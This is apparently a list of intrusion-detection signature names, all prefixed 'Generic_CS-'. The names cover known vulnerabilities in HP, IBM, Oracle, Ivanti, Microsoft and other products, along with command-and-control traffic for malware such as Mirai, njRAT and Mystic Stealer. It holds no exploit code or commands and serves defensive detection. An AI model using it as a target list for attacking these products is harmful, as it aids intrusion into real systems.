Generic_CS-HP-Data-Protector-Express-DtbClsLogin-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Express-Multiple-Stack-Buffer-Overflows
Generic_CS-HP-Data-Protector-Express-Stack-Based-Buffer-Overflow
Generic_CS-HP-Data-Protector-Manager-MMD-Service-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Manager-MMD-Service-Stack-DOS
Generic_CS-HP-Data-Protector-Manager-RDS-Denial-Of-Service
Generic_CS-HP-Data-Protector-Media-Operations-Denial-Of-Service
Generic_CS-HP-Data-Protector-Media-Operations-Directory-Traversal
Generic_CS-HP-Data-Protector-Media-Operations-Memory-Corruption
Generic_CS-HP-Data-Protector-Omniinet-Service-Null-Dereference-Denial-Of-Service
Generic_CS-HP-Data-Protector-Opcode-1091-Directory-Traversal
Generic_CS-HP-Data-Protector-Opcode-27-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Opcode-28-And-11-Command-Execution
Generic_CS-HP-Data-Protector-Opcode-28-And-11-Command-Execution-2
Generic_CS-HP-Data-Protector-Opcode-305-Directory-Traversal
Generic_CS-HP-Data-Protector-Opcode-42-Directory-Traversal
Generic_CS-HP-Data-Protector-Opcode-45-And-46-Code-Execution
Generic_CS-HP-Database-Archiving-Software-Giop-Opcode-0x0e-Buffer-Overflow
Generic_CS-HP-Database-Archiving-Software-Giop-Parsing-Buffer-Overflow
Generic_CS-HP-Diagnostics-Server-Buffer-Overflow
Generic_CS-HP-Intelligent-Management-Center-Buffer-Overflow
Generic_CS-HP-Intelligent-Management-Center-Img-Buffer-Overflow
Generic_CS-HP-Intelligent-Management-Center-Img-Buffer-Overflow-2
Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Diag-Processing-BOF
Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Login-Code-Execution
Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Ping-Processing-BOF
Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-SNMP-Processing-BOF
Generic_CS-HP-Lefthand-Virtual-SAN-Hydra-Credential-Information-Disclosure
Generic_CS-HP-Linux-Imaging-And-Printing-Project-Command-Execution
Generic_CS-HP-LoadRunner-And-Performance-Center-Libxdrutil-Mxdr_String-Heap-Buffer-Overflow
Generic_CS-HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow
Generic_CS-HP-LoadRunner-Xdr-Data-Handling-Heap-Buffer-Overflow
Generic_CS-HP-Mercury-LoadRunner-Agent-Commandline-Message-Buffer-Overflow
Generic_CS-HP-OpenView-Application-Recovery-Manager-Buffer-Overflow
Generic_CS-HP-OpenView-Client-Configuration-Manager-Code-Execution
Generic_CS-HP-OpenView-Network-Node-Manager-Denial-Of-Service-Exploit
Generic_CS-HP-OpenView-Network-Node-Manager-Ovalarmsrv-Integer-Overflow
Generic_CS-HP-OpenView-Network-Node-Manager-Ovalarmsrv-Service-Buffer-Overflow
Generic_CS-HP-OpenView-Operations-A.07.50-Buffer-Overflow
Generic_CS-HP-OpenView-Storage-Data-Protector-Cell-Manager-Heap-Buffer-Overflow
Generic_CS-HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow
Generic_CS-HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow-2
Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow
Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2
Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-3
Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-4
Generic_CS-HP-Operations-Agent-HEALTH-Packet-Parsing-Stack-Buffer-Overflow
Generic_CS-HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow
Generic_CS-HP-StorageWorks-File-Migration-Agent-Rsacifs.dll-Stack-BOF
Generic_CS-HP-StorageWorks-File-Migration-Agent-Rsaftp.dll-Stack-Buffer-Overflow
Generic_CS-HP-StorageWorks-Storage-Mirroring-Buffer-Overflow-Exploit
Generic_CS-HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Generic_CS-HP-StorageWorks-Virtual-SAN-Appliance-Command-Execution
Generic_CS-HPE-Data-Protector-Exec_Bar-Username-Buffer-Overflow
Generic_CS-HPE-Intelligent-Management-Center-Dbman-decryptMsgAes-Stack-Buffer-Overflow
Generic_CS-HPE-Intelligent-Management-Center-Dbman-FileTrans-Arbitrary-File-Write
Generic_CS-HPE-Intelligent-Management-Center-Dbman-Opcode-10003-Filename-DoS
Generic_CS-HPE-Intelligent-Management-Center-Dbman-Opcode-10014-DoS
Generic_CS-HPE-Intelligent-Management-Center-Dbman-Restoredbase-SQL-Command-Injection
Generic_CS-HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow
Generic_CS-HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow-CVE-2018-7115
Generic_CS-HPE-Intelligent-Management-Center-Dbman-Zipfile-Command-Injection
Generic_CS-HPE-Intelligent-Management-Center-Rmi-Registry-Insecure-Deserialization
Generic_CS-HTTP-Multiple-Illegal-Url-Characters
Generic_CS-Hupigon.FI-Traffic
Generic_CS-Hylafaxplus-LDAP-Authentication-User-Name-Buffer-Overflow
Generic_CS-IBM-Cognos-Buffer-Overflow
Generic_CS-IBM-DB2-Database-Server-SQL-REPEAT-Buffer-Overflow
Generic_CS-IBM-DB2-Universal-Database-Connection-Handshake-Denial-of-Service
Generic_CS-IBM-DB2-Universal-Database-Receivedasmessage-Buffer-Overflow
Generic_CS-IBM-DB2-Universal-Database-XML-Query-Buffer-Overflow
Generic_CS-IBM-Director-Agent-DOS
Generic_CS-IBM-Informix-Dynamic-Server-Bts_tracefile-Directory-Traversal
Generic_CS-IBM-Informix-Dynamic-Server-Command-Argument-Processing-BOF
Generic_CS-IBM-Informix-Dynamic-Server-Dbinfo-Stack-Buffer-Overflow
Generic_CS-IBM-Informix-Dynamic-Server-Long-Username-Buffer-Overflow
Generic_CS-IBM-Informix-Dynamic-Server-Long-Username-Vsprintf-Buffer-Overflow
Generic_CS-IBM-Informix-Dynamic-Server-Oninit.exe-Explain-Stack-Buffer-Overflow
Generic_CS-IBM-Informix-Dynamic-Server-Set-Environment-Stack-Buffer-Overflow
Generic_CS-IBM-Informix-Dynamic-Server-SunRPC-Buffer-Overflow
Generic_CS-IBM-solidDB-Denial-Of-Service
Generic_CS-IBM-solidDB-Logging-Function-Format-String
Generic_CS-IBM-solidDB-Redundant-Where-Clause-Denial-Of-Service
Generic_CS-IBM-solidDB-Rownum-Subquery-Denial-Of-Service
Generic_CS-IBM-solidDB-Solid.exe-Authentication-Bypass
Generic_CS-IBM-Tivoli-Storage-Manager-Client-CAD-Service-Buffer-Overflow
Generic_CS-IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Denial-Of-Service-CVE-2015-8523
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Opcode-0x09-Stack-Buffer-Overflow
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Stack-Buffer-Overflow
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Vault-Stack-Buffer-Overflow
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow-CVE-2015-1929
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1301-Format-String-Vulnerability
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Buffer-Overflow
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Directory-Traversal
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1330-Command-Injection
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1331-Rmdir-Command-Injection
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1332-Buffer-Overflow
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1335-Format-String-Vulnerability
Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-4115-Buffer-Overflow
Generic_CS-ICONICS-Genesis-Denial-Of-Service
Generic_CS-ICONICS-Genesis-Integer-Overflow
Generic_CS-IGEL-OS-Secure-VNC-Terminal-Command-Injection
Generic_CS-IGSS-DataServer-Denial-Of-Service
Generic_CS-IGSS-ODBC-Server-Denial-Of-Service
Generic_CS-Indusoft-CEServer-Buffer-Overflow
Generic_CS-Indusoft-Web-Studio-Remote-Agent-Buffer-Overflow
Generic_CS-Indusoft-Web-Studio-Unauthenticated-Insecure-Remote-Operations
Generic_CS-Ingres-Database-Communications-Server-Component-Heap-Buffer-Overflow
Generic_CS-Ingres-Database-Iidbms-Heap-Overflow
Generic_CS-Ingres-Database-Iidbms-Heap-Overflow-2
Generic_CS-Ingres-Database-Iidbms-Heap-Overflow-3
Generic_CS-Injector-2-Traffic
Generic_CS-Intelligent-Management-Center-Dbman-Restartdb-Command-Injection
Generic_CS-IOServer-OPC-Server-DoS
Generic_CS-IRC-Itlebot-Activity
Generic_CS-IRC-Mocbot-Activity
Generic_CS-IRC-Ngrbot-Activity-Detected
Generic_CS-IRC-Scan-Activity
Generic_CS-IRIX-lpsched-Command-Execution
Generic_CS-ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service
Generic_CS-ISC-Bind-Rndc-Control-Channel-Assertion-Failure-DoS
Generic_CS-iSCSI-Login-Request
Generic_CS-iSCSI-target-Multiple-Implementations-Buffer-Overflow
Generic_CS-iSCSI-target-Multiple-Implementations-Format-String-Code-Execution
Generic_CS-Ivanti-Avalanche-Datarepository-Service-Insecure-Deserialization
Generic_CS-Ivanti-Avalanche-Enterpriseserver-Getprofiledata-SQL-Injection
Generic_CS-Ivanti-Avalanche-Enterpriseserver-Getsettings-Authentication-Bypass
Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-getDisplayableTreeData-SQL-Injection
Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Getprofileapplicationdata-SQL-Injection
Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Save-SQL-Injection
Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Setuser-Authentication-Bypass
Generic_CS-Ivanti-Avalanche-Enterpriseserver-Setsettings-Authentication-Bypass
Generic_CS-Ivanti-Avalanche-Notification-Server-Insecure-Deserialization
Generic_CS-Ivanti-Avalanche-Printerdeviceserver-Service-Command-Injection
Generic_CS-Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal
Generic_CS-Ivanti-Avalanche-Statserver-Service-Insecure-Deserialization
Generic_CS-Ivanti-Avalanche-Web-File-Server-Insecure-Deserialization
Generic_CS-Ivanti-Avalanche-Web-Server-Authenticate-Authentication-Bypass
Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Stack-Buffer-Overflow
Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Null-Pointer-Dereference
Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Stack-Buffer-Overflow
Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference
Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-Stack-Buffer-Overflow
Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-102-Stack-Buffer-Overflow
Generic_CS-Ivanti-Avalanche-Wlinforailservice-H.Payform-Out-Of-Bounds-Read
Generic_CS-Ivanti-EPM-Agent-Portal-Command-Execution
Generic_CS-Java-Rmi-Remote-Command-Execution
Generic_CS-Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization
Generic_CS-Jenkins-Remoting-Fetchjar-Arbitrary-File-Read
Generic_CS-Jimcrat-Windows-Infection-Traffic
Generic_CS-Joizeparc-Linux-Infection-Traffic
Generic_CS-Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service
Generic_CS-Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service
Generic_CS-Kerio-Personal-Firewall-Buffer-Overflow
Generic_CS-LANDesk-Management-Suite-Qip-Service-Heal-Packet-Buffer-Overflow
Generic_CS-LCDproc-Parse_All_Client_Messages-Buffer-Overflow
Generic_CS-LCDproc-Test-Func-Buffer-Overflow-Vulnerability
Generic_CS-LCDproc-Test_Func-Format-String-Vulnerability
Generic_CS-Lethic-Activity
Generic_CS-Lianja-SQL-DbNetserver-Stack-Buffer-Overflow
Generic_CS-Libvnc-Libvncserver-Divide-By-Zero-Denial-Of-Service
Generic_CS-Libvnc-Libvncserver-Tight-File-Transfer-Extension-Use-After-Free
Generic_CS-Libvncserver-File-Transfer-Extension-Heap-Based-Buffer-Overflow
Generic_CS-Linksys-WAP610N-Unauthenticated-Root-Access
Generic_CS-Linux-Kernel-iSCSI_Add_Notunderstood_Response-Heap-Buffer-Overflow
Generic_CS-Linux-Kernel-Nfsd-Heap-Buffer-Overflow
Generic_CS-LoadRunner-magentproc.exe-Stack-Buffer-Overflow
Generic_CS-Log4j-Remote-Code-Execution
Generic_CS-Lolibotinc-Linux-Infection-Traffic
Generic_CS-Macromedia-Flash-Media-Server-Administration-Service-Denial-of-Service
Generic_CS-Manutharcs-Linux-Infection-Traffic
Generic_CS-McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow
Generic_CS-Measuresoft-ScadaPro-Directory-Traversal
Generic_CS-Measuresoft-ScadaPro-Remote-Code-Execution
Generic_CS-Measuresoft-ScadaPro-XF-Command-Execution
Generic_CS-Media-Player-Network-Sharing-Service-Code-Execution-CVE-2010-3225
Generic_CS-Media-Services-Buffer-Overflow-CVE-2010-0478
Generic_CS-Media-Services-Buffer-Overflow-Exploit-CVE-2010-0478
Generic_CS-Memcached-Add-Request
Generic_CS-Memcached-Denial-Of-Service
Generic_CS-Memcached-Get-Request
Generic_CS-Memcached-Lru-Mode-And-Temp_TTL-Commands-Denial-of-Service
Generic_CS-Memcached-Process_Bin_Append_Prepend-Integer-Overflow
Generic_CS-Memcached-Process_Bin_SASL_Auth-Integer-Underflow
Generic_CS-Memcached-Process_Bin_Update-Body_Len-Integer-Overflow
Generic_CS-Memcached-Set-Request
Generic_CS-Memcached-Suspicious-Bind-Command
Generic_CS-Memcached-Try_Read_Command_Binary-Stack-Buffer-Overflow
Generic_CS-Metasploit-msfd-Remote-Code-Execution
Generic_CS-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow
Generic_CS-Microsoft-DirectPlay-Denial-Of-Service
Generic_CS-Microsoft-Host-Integration-Server-Snabase.exe-Infinite-Loop-DOS
Generic_CS-Microsoft-IIS-Schannel-Improper-Certificate-Verification
Generic_CS-Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal
Generic_CS-Microsoft-Message-Queuing-Binary-Protocol-Usage
Generic_CS-Microsoft-Message-Queuing-Remote-Code-Execution-Vulnerability-CVE-2023-21554
Generic_CS-Microsoft-SQL-Server-Payload-Execution
Generic_CS-Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
Generic_CS-Microsoft-Windows-Authentication-Kerberos-NTLM-Fallback-Security-Bypass
Generic_CS-Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service
Generic_CS-Microsoft-Windows-DHCP-Server-Failover-DoS
Generic_CS-Microsoft-Windows-DHCP-Server-Failover-Mfparsedhcpfailovermessage-Out-Of-Bounds-Read
Generic_CS-Microsoft-Windows-DHCP-Server-Failover-Remote-Code-Execution
Generic_CS-Microsoft-Windows-Kerberos-KDC-Privilege-Escalation
Generic_CS-Microsoft-Windows-Message-Queuing-Service-CVE-2025-21285-Null-Pointer-Dereference
Generic_CS-Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-21769
Generic_CS-Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-28302
Generic_CS-Microsoft-Windows-Network-File-System-CVE-2022-30136-Remote-Code-Execution
Generic_CS-Microsoft-Windows-NFS-CVE-2022-34715-RCE-Vulnerability
Generic_CS-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Generic_CS-Microsoft-Windows-RDS-DVC-Decompression-Heap-Buffer-Overflow
Generic_CS-Microsoft-Windows-Remote-Desktop-Connection-Attempt
Generic_CS-Microsoft-Windows-Remote-Desktop-Protocol-Denial-of-Service
Generic_CS-Microsoft-Windows-Remote-Desktop-Services-Heap-Buffer-Overflow
Generic_CS-Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service
Generic_CS-Microsoft-Windows-Vulnerability-CVE-2017-0016
Generic_CS-Microsoft-WSDAPI-Memory-Corruption-MS09-063
Generic_CS-MikroTik-Router-OS-Buffer-Overflow-Vulnerability-CVE-2018-7445
Generic_CS-MikroTik-RouterOS-Authentication-Bypass
Generic_CS-MiniUPnP-Stack-Based-Buffer-Overflow
Generic_CS-Mirai-Botnet-C-And-C-Traffic
Generic_CS-Mirai-Botnet-C-And-C-Traffic-2
Generic_CS-Mirai-Botnet-C-And-C-Traffic-3
Generic_CS-Mirai-Botnet-C-And-C-Traffic-4
Generic_CS-MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service
Generic_CS-MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service
Generic_CS-MIT-Kerberos-5-Kadmind-Kadm5_Policy-Denial-Of-Service
Generic_CS-MIT-Kerberos-5-Kadmind-Null-Pointer-Dereference
Generic_CS-MIT-Kerberos-5-KDC-Null-Pointer-Dereference
Generic_CS-MIT-Kerberos-5-KDC-TCP-Handling-Denial-of-Service
Generic_CS-MIT-Kerberos-5-Recvauth-Invalid-Memory-Access
Generic_CS-MIT-Kerberos-5-SPNEGO-Acceptor-acc_ctx_cont-Denial-of-Service
Generic_CS-Mobile-Mouse-RCE
Generic_CS-Momentum-Botnet-C-And-C-Traffic
Generic_CS-MongoDB-Unauthenticated-Remote-Database-Drop
Generic_CS-Mosca-MQTT-Invalid-Regex-Denial-Of-Service-CVE-2018-11615
Generic_CS-MS-Windows-RDP-Vulnerability-CVE-2015-2373
Generic_CS-MSRPC-Big-Endian-Byte-Order-Used
Generic_CS-MSRPC-Small-Fragments-Used
Generic_CS-Multiple-Schneider-Electric-Products-Denial-Of-Service
Generic_CS-Multiple-Vendor-TCP-Timestamp-Option-Denial-of-Service
Generic_CS-Mystic-Stealer-Malware-C2-Traffic
Generic_CS-Mytob-Traffic
Generic_CS-Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution
Generic_CS-Nagios-Remote-Plugin-Executor-Command-Injection
Generic_CS-Nanopool-Claymore-Dual-Miner-RCE
Generic_CS-Nessus-Vulnerability-Scanner-Usage
Generic_CS-Netatalk-Dsi_Ppensession-Attention-Quantum-Out-Of-Bounds-Write
Generic_CS-Netatalk-Dsi_writeinit-Heap-Buffer-Overflow-Vulnerability
Generic_CS-Netcat-Stack-Buffer-Overflow
Generic_CS-Netgain-Systems-Enterprise-Manager-Rmi-Registry-Insecure-Deserialization
Generic_CS-NetSupport-Manager-Client-Buffer-Overflow
Generic_CS-NetWire-RAT-Infection-Traffic
Generic_CS-NFS-utils-TCP-Connection-Termination-Denial-Of-Service
Generic_CS-Nitol-Activity
Generic_CS-Nitol-Activity-2
Generic_CS-njRAT-Activity
Generic_CS-njRAT-CnC-Traffic
Generic_CS-NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow
Generic_CS-Njworm-CnC-Traffic
Generic_CS-Novell-Distributed-Print-Services-Integer-Overflow
Generic_CS-Novell-eDirectory-dhost-Httpstk-Buffer-Overflow
Generic_CS-Novell-eDirectory-NCP-Stack-Buffer-Overflow
Generic_CS-Novell-eDirectory-NDS-Verb-0x01-Integer-Overflow
Generic_CS-Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow
Generic_CS-Novell-File-Reporter-Vol-Tag-Heap-Buffer-Overflow
Generic_CS-Novell-File-Reporter-Vol-Tag-Stack-Buffer-Overflow
Generic_CS-Novell-Groupwise-Messenger-Memory-Information-Disclosure
Generic_CS-Novell-Groupwise-Messenger-Nmma.exe-Login-Memory-Corruption
Generic_CS-Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass
Generic_CS-Novell-NetWare-AFP-Remote-Denial-Of-Service
Generic_CS-Novell-ZENworks-Configuration-Management-Directory-Traversal
Generic_CS-Novell-ZENworks-Configuration-Management-Preboot-Directory-Traversal
Generic_CS-Novell-ZENworks-Handheld-Management-Buffer-Overflow
Generic_CS-Novell-ZENworks-Handheld-Management-Upload-Directory-Traversal
Generic_CS-Novell-ZENworks-Handheld-Management-Zfhipcnd.exe-Buffer-Overflow
Generic_CS-Novell-ZENworks-Preboot-Service-Code-Execution
Generic_CS-Novell-ZENworks-Preboot-Service-Opcode-4c-Buffer-Overflow
Generic_CS-Novell-ZENworks-Preboot-Service-Opcode-6c-Buffer-Overflow
Generic_CS-Novell-ZENworks-Remote-Management-Buffer-Overflow
Generic_CS-Nuuo-CMS-Arbitrary-File-Download
Generic_CS-OPC-Systems-Denial-of-Service
Generic_CS-OpenNMS-Rmi-Java-Object-Deserialization
Generic_CS-Optima-Apiftp-Server-Exe-Denial-of-Service
Generic_CS-Oracle-Coherence-CVE-2020-14756-Insecure-Deserialization
Generic_CS-Oracle-Create-Database-Link-Buffer-Overflow
Generic_CS-Oracle-Database-DBMS-Scheduler-Privilege-Escalation
Generic_CS-Oracle-Database-InterMedia-DoS
Generic_CS-Oracle-Database-Server-DBMS-DCD-PUBLISH-SQL-Injection
Generic_CS-Oracle-Database-Server-MD2-SDO-Code-Size-BOF
Generic_CS-Oracle-Database-Server-MD2-Validate-Geom-BOF
Generic_CS-Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection
Generic_CS-Oracle-Database-Server-XDB-Pitrig-truncate-Procedure-Buffer-Overflow
Generic_CS-Oracle-Database-SYS.OLAPIMPL-T-Package-ODCITABLESTART-Buffer-Overflow
Generic_CS-Oracle-Database-TNS-Listener-Registration-Lack-Of-Authentication
Generic_CS-Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF
Generic_CS-Oracle-GlassFish-Server-Authenticated-Code-Execution
Generic_CS-Oracle-GoldenGate-Manager-Command-Report-DoS
Generic_CS-Oracle-GoldenGate-Manager-Command-Stack-Buffer-Overflow
Generic_CS-Oracle-GoldenGate-Manager-Tab-Parsing-DoS
Generic_CS-Oracle-GoldenGate-Message-Length
Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_cm_regref-Handling-Remote-Code-Execution
Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_continueb-Handling-Remote-Code-Execution
Generic_CS-Oracle-Mysql-Cluster-Data-Node-GSN_Processinfo_Rep-Handling-Remote-Code-Execution
Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_Sync_path_req-Parsing-Integer-Underflow
Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_TRIG_ATTRINFO-Handling-Buffer-Overflow
Generic_CS-Oracle-MySQL-Cluster-GSN_CREATE_FRAGMENTATION_REQ-Buffer-Overflow
Generic_CS-Oracle-MySQL-Cluster-Management-API-dumpState-Stack-Buffer-Overflow
Generic_CS-Oracle-MySQL-Cluster-Management-API-Report_Event-Stack-Buffer-Overflow
Generic_CS-Oracle-MySQL-Cluster-Management-API-Stack-Buffer-Overflow
Generic_CS-Oracle-MySQL-Server-Innodb-Memcached-Plugin-Get-Request-Buffer-Overflow
Generic_CS-Oracle-MySQL-Server-Innodb-Memcached-Plugin-SASL_Auth-Integer-Underflow
Generic_CS-Oracle-Secure-Backup-NDMP-Packet-Handling-Multiple-Denial-Of-Service
Generic_CS-Oracle-Solaris-RPC-CVE-2017-3623-Heap-Buffer-Overflow
Generic_CS-Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10272-Information-Disclosure
Generic_CS-Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10278-Heap-Buffer-Overflow
Generic_CS-Oracle-Web-Cache-Unspecified-Client-Request-Handling-1
Generic_CS-Oracle-Web-Cache-Unspecified-Client-Request-Handling-2
Generic_CS-Oracle-WebLogic-CVE-2019-2890-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-CVE-2020-2551-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-CVE-2020-2798-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-CVE-2020-2883-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-CVE-2020-2884-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-CVE-2020-2963-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-Ejbtaglibdescriptor-External-Entity-Injection
Generic_CS-Oracle-WebLogic-Foreignrecoverycontext-External-Entity-Injection
Generic_CS-Oracle-WebLogic-Insecure-Deserialization-CVE-2021-2394
Generic_CS-Oracle-WebLogic-Limitfilter-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-Server-AbsPlatTransManager-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-Server-Aqjmsinitialcontextfactory-JNDI-Injection
Generic_CS-Oracle-WebLogic-Server-Commons-Collections-Library-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-Server-Deserialization-Remote-Command-Execution-Vulnerability
Generic_CS-Oracle-WebLogic-Server-Fileupload-Library-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-Server-Information-Disclosure-Vulnerability-CVE-2023-21839
Generic_CS-Oracle-WebLogic-Server-LinkRef-JNDI-Injection-CVE-2023-21931
Generic_CS-Oracle-WebLogic-Server-Node-Manager-Command-Execution
Generic_CS-Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-Server-Unicastref-Insecure-Deserialization
Generic_CS-Oracle-WebLogic-Unknownmsgheader-External-Entity-Injection
Generic_CS-Oracle-WebLogic-Wsrmsequencecontext-External-Entity-Injection
Generic_CS-Oracle-WebLogic-Wsrmserverpayloadcontext-External-Entity-Injection
Generic_CS-Oracle10g-TNS-Auth-Sesskey-BOF
Generic_CS-Overly-Long-RTSP-Host-Header
Generic_CS-Pabueri.A-Traffic
Generic_CS-Paradoxyhua-Linux-Infection-Traffic
Generic_CS-Parallax-RAT-Traffic
Generic_CS-PeerCast-Request-Format-String
Generic_CS-Persistent-Systems-Radia-Client-Automation-Command-Execution
Generic_CS-PingPull-Trojan-C2-TCP-Traffic
Generic_CS-Pinkslip-Bot-Traffic
Generic_CS-PostgreSQL-Bit-Substring-Buffer-Overflow
Generic_CS-PostgreSQL-Database-Core-Server-Non-libpq-Client-Policy-Bypass
Generic_CS-PostgreSQL-Database-Datetime-Buffer-Overflow
Generic_CS-PostgreSQL-Database-Geo_Ops-Path_In-Integer-Overflow
Generic_CS-PostgreSQL-Database-Password-Change-Stack-Buffer-Overflow
Generic_CS-PostgreSQL-Database-Set-Role-Security-Bypass
Generic_CS-PostgreSQL-Source-From-Tmp
Generic_CS-Potential-Apache-Couchdb-Erlang-RCE
Generic_CS-Progea-Movicon-11-Server-Denial-Of-Service
Generic_CS-Progress-WhatsUp-Gold-Directory-Traversal-CVE-2024-46909
Generic_CS-Progress-WhatsUp-Gold-Potential-Directory-Traversal-CVE-2024-46909
Generic_CS-Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-4883
Generic_CS-Pushbot-Bot-Traffic
Generic_CS-Pushdo-B-Activity
Generic_CS-Qakbot-Botnet-Traffic-4
Generic_CS-Qemu-Monitor-HMP-Migrate-Command-Execution
Generic_CS-QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection
Generic_CS-QNAP-Transcode-Server-Command-Execution
Generic_CS-QNX-Phrelay-DoS
Generic_CS-QNX-QCONN-Denial-Of-Service-Denial-Of-Service
Generic_CS-Qognify-Ocularis-Eventcoordinator-Insecure-Deserialization
Generic_CS-Quagga-Aspath_Put-BGP-Session-Drop-Denial-Of-Service
Generic_CS-Quagga-Daemon-BGP_Update_Receive-Double-Free
Generic_CS-Quagga-Vty-Interface-Denial-Of-Service
Generic_CS-Quest-Privilege-Manager-pmmasterd-Buffer-Overflow
Generic_CS-Quest-Software-Big-Brother-Arbitrary-File-Deletion-And-Overwriting
Generic_CS-QuickTime-Darwin-Streaming-Server-Buffer-Overflow
Generic_CS-Ramnit-Activity
Generic_CS-RealFlex-RealWin-Buffer-Overflow-Attempt
Generic_CS-RealFlex-RealWin-FC_RFUSER_FCS_Login-Buffer-Overflow
Generic_CS-RealFlex-RealWin-FC_Script_FCS_STARTPROG-Buffer-Overflow
Generic_CS-RealFlex-RealWin-SCADA-Scpc_Initialize-Buffer-Overflow
Generic_CS-RealFlex-RealWin-Tag-Manipulation-Buffer-Overflow
Generic_CS-RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow
Generic_CS-RealNetworks-Helix-Server-RTSP-Describe-Heap-Buffer-Overflow
Generic_CS-RealNetworks-Helix-Server-RTSP-GET-Long-URI
Generic_CS-RealNetworks-Helix-Server-RTSP-Set-Parameters-Request-DoS
Generic_CS-RealNetworks-Helix-Server-RTSP-Setup-Request-Denial-Of-Service
Generic_CS-RealNetworks-Helix-Server-SNMP-Master-Agent-Open-PDU-DOS
Generic_CS-RealNetworks-Helix-Transport-Header-Overflow
Generic_CS-RealNetworks-Helix-Universal-Server-Denial-Of-Service-Vulnerability
Generic_CS-Recslurp-Botnet-Traffic
Generic_CS-Red-Hat-Jboss-Data-Grid-Hotrod-Client-Insecure-Deserialization
Generic_CS-Redhat-Jboss-JNDI-Lack-of-Authentication
